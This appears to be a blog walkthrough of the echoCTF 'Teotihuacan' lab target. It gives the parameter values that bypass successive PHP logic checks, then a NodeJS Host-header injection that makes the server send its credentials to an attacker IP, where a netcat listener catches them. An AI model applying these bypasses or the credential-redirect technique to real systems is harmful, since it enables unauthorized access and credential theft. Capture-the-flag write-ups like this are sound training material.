Teotihuacan – Walk Through – echoCTF

IP Address: 10.0.30.190
Description: Just like the pyramids of Teotihuacán, this target feels like a step-pyramid
Extra Info: Just like a step-pyramid from Teotihuacán, you have to climb step-by-step until you reach the top. You have to get the following flags

Steps:
Like any other target, we start by simply entering the IP Address in browser.
Opening http://10.0.30.190/ returns a PHP code and anyone with basic PHP skills know what this code does.
Now we enter http://10.0.30.190/?hasAdminAccess=true in browser to get our first flag.
ETSCTF_x

Along with the flag, we got a message that says “The next challenge is located at switch_and_twist” and a link to http://10.0.30.190/switch_and_twist/

Now again we have a piece of PHP code but this time it requires some intermediate PHP skills to understand what this code does.

Using Postman, we have to send the below request:
http://10.0.30.190/switch_and_twist/
hmac=” ”
host=”asdasdasd”
nonce=””
Note: I had to debug this PHP code on local Apache to fully understand its logic.

Now we got our second flag ETSCTF_xx with the message “The next challenge is located at overprinting” and a link to http://10.0.30.190/overprinting/

Again, we are presented with PHP code and this time, it requires basic arithmetic knowledge along with advanced PHP understanding.

After some hit and try, playing with this PHP code on local Apache, we finally get the code required to pass this challenge.
http://10.0.30.190/overprinting/?print=print=111111

As a result, we get our third flag:
“The next challenge is located at /got_creds/ ETSCTF_xxx”

If you really know PHP well, you will notice another logic in this code and so we found another code:
http://10.0.30.190/overprinting/?print=011111

As expected, this code gives us our fourth flag:
“Awesome work, here is anothe flag for your troubles ETSCTF_xxxx”

Now we hit http://10.0.30.190/got_creds/ and get some NodeJS code.
This code is fairly simple and doesn’t require any deep NodeJS skills.

From the NodeJS code we get a link to http://10.0.30.190/got_creds/example

Upon hitting the above link, we get a JSON response with our fifth flag:
{“body”:{“ETSCTF”:”ETSCTF_xxxxx”}}

Now we have no more hints and there is something to do with this NodeJS code:
Upon close inspection, we see a call:
http.get(`http://${req.headers.host}?auth=${JSON.stringify(credentials)}`

Using Postman, we have to send request to http://10.0.30.190/got_creds/example with the “Host” header set to our attacker IP which in our case is “10.10.0.123”

Before sending the above request, we have to run a netcat listener on our attacker machine using the command:
nc -nlvp 80

As soon as we send the request from Postman, we get our sixth and final flag on netcat listener:
ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this CTF 🙂

Tags: , , , , , , , , , , , , , ,

Leave a Reply

Current [email protected] *